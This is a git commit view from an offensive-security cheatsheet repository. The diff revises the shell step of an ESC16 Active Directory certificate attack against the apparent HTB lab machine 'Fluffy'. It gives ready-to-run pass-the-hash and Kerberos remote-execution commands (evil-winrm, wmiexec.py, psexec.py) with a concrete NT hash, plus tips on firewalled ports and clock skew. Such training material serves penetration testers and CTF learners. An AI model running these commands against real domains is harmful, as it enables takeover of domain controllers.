daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit a5a5703a1f2d2232fb856b55e0ef2bfe5ee1c656
parent ee04540e21f550713f99d8551d5ef5c01b7aaaf5
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Mon, 14 Sep 2026 00:18:52 +0100

fix: added more information to ESC16, wmiexec on fluffy does not work making sure reader knows this

Diffstat:
Msrc/content/sheets/active-directory/esc16-security-extension-disabled-on-ca-globally.md | 15++++++++++++---
1 file changed, 12 insertions(+), 3 deletions(-)

diff --git a/src/content/sheets/active-directory/esc16-security-extension-disabled-on-ca-globally.md b/src/content/sheets/active-directory/esc16-security-extension-disabled-on-ca-globally.md @@ -213,15 +213,24 @@ certipy-ad auth -dc-ip $TARGET -pfx administrator.pfx -u administrator -domain f ### Step 5 — Shell +**Preferred — pass-the-hash over WinRM (no DCOM, no Kerberos):** ```bash -export KRB5CCNAME=administrator.ccache -wmiexec.py -k -no-pass DC01.fluffy.htb +evil-winrm -i $TARGET -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e ``` +**Kerberos wmiexec — only if RPC/DCOM is reachable:** ```bash -evil-winrm -i $TARGET -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e +export KRB5CCNAME=administrator.ccache +wmiexec.py -k -no-pass DC01.fluffy.htb ``` +> [!warning] `wmiexec` needs DCOM (port 135 + a dynamic high RPC port) — often filtered on a DC +> On Fluffy, `135` is filtered while `445` and `5985` are open, so `wmiexec.py` negotiates SMB then dies with `Could not connect: timed out` on the DCOM leg. That is a **port/firewall** problem, not a bad ticket. Use a method that fits the open ports: +> - **WinRM 5985** → `evil-winrm` (above) — cleanest with the NT hash. +> - **SMB 445** → `psexec.py` / `atexec.py` / `smbexec.py`, e.g. `psexec.py -hashes :8da83a3fa618b6e3a00e93f676c92a6e administrator@$TARGET`. +> +> **Pass-the-hash (NTLM) also sidesteps clock skew.** Any `-k`/Kerberos tool fails with `KRB_AP_ERR_SKEW` if your clock is >5 min off the DC — sync first (`sudo ntpdate -u $TARGET` or `sudo rdate -n $TARGET`) or prefix `faketime`. The `-H <hash>` methods above use NTLM and don't care about the clock. + *** ## Generic Exploitation — Every Way to Do It